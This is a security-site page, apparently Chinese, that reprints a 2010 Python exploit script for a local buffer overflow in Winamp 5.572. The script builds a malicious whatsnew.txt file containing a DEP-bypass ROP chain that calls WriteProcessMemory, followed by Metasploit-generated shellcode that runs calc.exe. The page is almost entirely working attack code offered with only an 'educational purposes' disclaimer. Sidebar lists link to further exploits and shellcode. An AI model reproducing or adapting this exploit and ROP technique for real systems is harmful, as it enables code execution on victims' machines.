首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)
来源:http://tecninja.net/blog 作者:TecR0c 发布时间:2010-06-18  
#!/usr/bin/python
#
# Title:                Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)
# Author:               Rocco Calvi aka TecR0c - http://tecninja.net/blog | http://twitter.com/TecR0c
# Found BY:             Debug
# Date:                 June 18th, 2010
# Platform:             Windows XP sp3 En
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Special thanks to mr_me for making me try harder and lincoln


# Usage stage 1 : Replace existing whatsnew.txt file with evil whatsnew.txt 

# Usage stage 2 : Launch Application > Help > About Winamp > Version History > BOOM!

 
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] Winamp 5.572 (whatnews.txt) DEP Bypass - by TecR0c"



# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");


version = "Winamp 5.572"

rop = "\x41" * 540          # Crash


rop += "\x09\x12\x0e\x07"   # 0x070E1209 :  {POP}  # POP EDI # POP ESI # POP EBP
                            # XOR EAX,EAX # POP EBX # RETN               	[Module : nde.dll] 


rop += "\xee\xff\xff\xc0"   # 0xc0ffffee :  Junk
rop += "\xee\xff\xff\xc0"   # 0xc0ffffee :  Junk
rop += "\xee\xff\xff\xc0"   # 0xc0ffffee :  Junk
rop += "\xee\xff\xff\xc0"   # 0xc0ffffee :  Junk


rop += "\x03\x85\x09\x07"   # 0x07098503 :  EAX CALL   
rop += "\xee\xff\xff\xc0"   # 0xc0ffffee :  Junk
rop += "\xee\xff\xff\xc0"   # 0xc0ffffee :  Junk
rop += "\xff\xff\xff\xff"   # 0xffffffff :  for EBX


rop += "\xc5\x01\x5a\x78"   # 0x785A01C5 :  # POP EDX # RETN 	                [Module : MSVCR90.dll] 
rop += "\x10\xe0\x10\x07"   # 0x07100e01 :  Writeable Address


rop += "\x46\x17\x5a\x78"   # 0x785A1746 :  # ADD EAX,40 # POP EBP # RETN 	[Module : MSVCR90.dll]
rop += "\xee\xff\xff\xc0"   # 0xc0ffffee :  Junk
rop += "\x6e\x22\x97\x7c"   # 0x7C97226E :  # ADD EAX,100 # POP EBP # RETN
rop += "\xcf\x22\x80\x7c"   # 0x7C8022CF :  dest address in WriteProcessMemory()


rop += "\xcf\xc9\x0e\x07"   # 0x070EC9CF :  # ADD EBX,EAX # XOR AL,AL # RETN 	[Module : nde.dll]
rop += "\x5e\x89\x09\x07"   # 0x0709895E :  {POP}  # POP EAX # POP ESI # RETN 	[Module : libsndfile.dll] 
rop += "\x13\x22\x80\x7c"   # 0x7C802213 :  WriteProcessMemory 
rop += "\xff\xff\xff\xff"   # 0xffffffff :  HProcess HANDLE (-1)


rop += "\x65\x08\x59\x78"   # 0x78590865 :  # PUSHAD # RETN 	                [Module : MSVCR90.dll] 


junk = "\x43" * 800


tecfile = open('whatsnew.txt','w')
tecfile.write(version + rop + sc + junk)
tecfile.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Netware SMB Remote Stack Overf
·Rosoft Audio Converter 4.4.4 B
·BlazeDVD v5.1 (.plf) Stack Buf
·DMSEasy0.9.7 (fckeditor) Arbit
·File Sharing Wizard Version 1.
·linux/x86 bindport to 31337 wi
·linux/x86 bindport to 13123 Po
·linux/x86 execute /bin/sh with
·linux/x86 chmod("/etc/shadow",
·linux/x86 chmod 777 polymorphi
·Google Chrome 5.0.375.70 Remot
·linux/x86 cdrom ejecting polym
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved